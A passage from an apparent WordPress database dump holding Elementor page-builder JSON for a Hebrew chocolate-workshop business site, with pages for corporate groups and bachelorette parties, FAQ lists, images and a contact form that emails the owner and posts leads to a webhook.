\\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"chocolate4u\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"]},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cc34f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6c196b7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7827cc50\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7b209b5a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05de\\u05e9\\u05e8\\u05d3 \\/ \\u05d1\\u05d9\\u05ea (\\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d1\\u05d9\\u05df \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05dc4\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05dc \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d6\\u05d4 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d0\\u05ea\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d4\\u05db\\u05e0\\u05ea\\u05dd (\\u05d0\\u05dd \\u05d9\\u05d9\\u05e9\\u05d0\\u05e8)\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05db\\u05de\\u05d4 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"741268fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e2f4f1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/06\\/logo1.png\",\"id\":190}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1571,324,'_elementor_version','0.4'),(1572,324,'_elementor_template_type','post'),(1575,325,'_wp_page_template','elementor_header_footer'),(1576,325,'_elementor_edit_mode','builder'),(1577,325,'_elementor_data','[{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea (\\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\/ \\u05d2\\u05d3\\u05d5\\u05dc\\u05d5\\u05ea)\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"chocolate4u\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34824&lm_key=fa721ea141794a3db374e600fc05ee2c\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cc34f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6c196b7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7827cc50\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7b209b5a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05de\\u05e9\\u05e8\\u05d3 \\/ \\u05d1\\u05d9\\u05ea (\\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d1\\u05d9\\u05df \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05dc4\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05dc \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d6\\u05d4 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d0\\u05ea\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d4\\u05db\\u05e0\\u05ea\\u05dd (\\u05d0\\u05dd \\u05d9\\u05d9\\u05e9\\u05d0\\u05e8)\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05db\\u05de\\u05d4 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"741268fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e2f4f1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/06\\/logo1.png\",\"id\":190}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1578,325,'_elementor_version','0.4'),(1579,325,'_elementor_template_type','post'),(1581,326,'_wp_page_template','elementor_header_footer'),(1582,326,'_elementor_edit_mode','builder'),(1583,326,'_elementor_template_type','post'),(1584,326,'_elementor_data','[{\"id\":\"e598d46\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5064e7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3f5421\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c6b6e2f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4bb4f72e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"6ddff824\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df02b1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/bach-choco.jpg\",\"id\":97},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4b78ab22\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05df, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05dc\\u05db\\u05dc \\u05d0\\u05d3\\u05dd.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4. \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05d4\\u05e8\\u05d1\\u05d4 